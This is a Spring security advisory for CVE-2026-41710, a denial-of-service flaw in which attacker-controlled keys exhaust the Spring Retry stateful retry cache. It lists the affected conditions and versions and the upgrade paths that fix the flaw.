Get ahead
VMware offers training and certification to turbo-charge your progress.
Learn moreCVE-2026-41710: Cache Exhaustion in Stateful Retries leads to Denial of Service
Description
An attacker can craft a large number of unique requests that trigger a failure, exhausting the capacity of the application-wide stateful retry cache. Once the cache is full, it permanently rejects any further updates, causing all later stateful retries and circuit breakers in the application to fail.
This issue only affects applications where all the following are true:
- It explicitly enables stateful retries using
@Retryable(stateful=true). - The cache keys for these stateful retries are attacker-controlled, which is the case with the default key generator if the method arguments are provided by the attacker.
- The attacker can cause the invocation to fail and ensure the same request is never re-presented.
Because cache entries are only removed upon success or retry exhaustion, a failed item that is abandoned stays in the cache forever.
Stateless retries, which are the default behavior, are not vulnerable.
Affected Spring Products and Versions
Spring Retry:
- 2.0.0 - 2.0.12
- 1.3.0 - 1.3.4
Versions that are no longer supported are also affected.
Mitigation
Users of affected versions should upgrade to the corresponding fixed version.
| Affected version(s) | Fix version | Availability |
|---|---|---|
| 2.0.x | 2.0.13 | OSS |
| 2.0.12.1 | Enterprise Support Only | |
| 1.3.x | 1.3.5 | Enterprise Support Only |
References
History
- 2026-06-08: Initial vulnerability report published.
Reporting a vulnerability
To report a security vulnerability for a project within the Spring portfolio, see the Security Policy
Get support
Tanzu Spring offers support and binaries for OpenJDK™, Spring, and Apache Tomcat® in one simple subscription.
Learn moreUpcoming events
Check out all the upcoming events in the Spring community.
View all